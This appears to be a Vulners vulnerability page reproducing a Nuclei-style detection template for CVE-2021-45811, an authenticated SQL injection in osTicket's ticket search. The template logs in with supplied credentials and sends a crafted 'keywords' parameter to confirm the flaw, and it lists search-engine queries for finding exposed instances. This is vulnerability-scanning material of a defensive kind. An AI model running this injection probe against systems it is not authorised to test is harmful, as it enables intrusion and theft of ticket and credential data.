| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2021-45811 | 8 Sep 202302:15 | – | attackerkb | |
| CVE-2021-45811 | 8 Sep 202307:19 | – | circl | |
| Enhancesoft osTicket SQL Injection Vulnerability | 8 Sep 202300:00 | – | cnnvd | |
| CVE-2021-45811 | 8 Sep 202300:00 | – | cve | |
| CVE-2021-45811 | 8 Sep 202300:00 | – | cvelist | |
| CVE-2021-45811 | 8 Sep 202302:15 | – | nvd | |
| Sql injection | 8 Sep 202302:15 | – | prion | |
| CVE-2021-45811 | 22 May 202521:08 | – | redhatcve | |
| CVE-2021-45811 | 8 Sep 202300:00 | – | vulnrichment |
id: CVE-2021-45811
info:
name: osTicket 1.15.x - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination.
impact: |
Authenticated attackers can exploit SQL injection in the Search functionality to extract sensitive database contents including user credentials and ticket information.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://members.backbox.org/osticket-sql-injection/
- https://nvd.nist.gov/vuln/detail/CVE-2021-45811
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-45811
cwe-id: CWE-89
epss-score: 0.02808
epss-percentile: 0.84783
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2021,osticket,sqli,authenticated,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance")
# digest: 4b0a00483046022100bfecae94d5e5feae749bc0b84c4fe0ee20af52069fa70fd23babb79f242d4a2002210086e41772dd2c6cb719d6888fb3e64dba5acd8b965753c81883a8f76815f755c1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation